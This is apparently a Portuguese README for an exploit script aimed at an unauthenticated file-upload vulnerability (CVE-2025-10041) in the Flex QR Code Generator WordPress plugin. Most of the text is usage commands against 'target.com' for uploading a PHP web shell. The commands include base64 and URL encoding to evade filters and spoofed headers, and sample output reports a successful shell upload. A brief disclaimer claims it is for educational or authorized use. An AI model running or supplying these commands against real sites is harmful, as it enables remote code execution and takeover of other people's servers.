
Flex QR Code Generator <= 1.2.5 - Upload Arbitrário de Arquivos Não Autenticado
Flex QR Code Generator <= 1.2.5 - Upload Arbitrário de Arquivos Não Autenticado
O plugin Flex QR Code Generator para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação do tipo de arquivo na função save_qr_code_to_db() em todas as versões até, e incluindo, 1.2.5.
Isso permite que atacantes não autenticados façam upload de arquivos maliciosos para o servidor do site afetado, potencialmente levando à execução remota de código.
CVE-2025-100419.8 (Crítico)O CVE-2025-10041.py é uma ferramenta de exploit profissional projetada para automatizar o ataque aproveitando esta vulnerabilidade.
Ele oferece recursos avançados para contornar proteções comuns e técnicas de codificação.
python3 CVE-2025-10041.py -u http://target.com
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
Para ver todas as opções disponíveis e instruções de uso:
python3 CVE-2025-10041.py --help
.php ou nomes suspeitos; a codificação pode evadir filtros.eval(base64_decode(...)) pode contornar filtros de conteúdo.Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
Este script é fornecido apenas para fins educacionais, de pesquisa e de teste de penetração autorizado.
O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é estritamente proibido e ilegal.
O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.
Nxploited (Khaled Alenazi)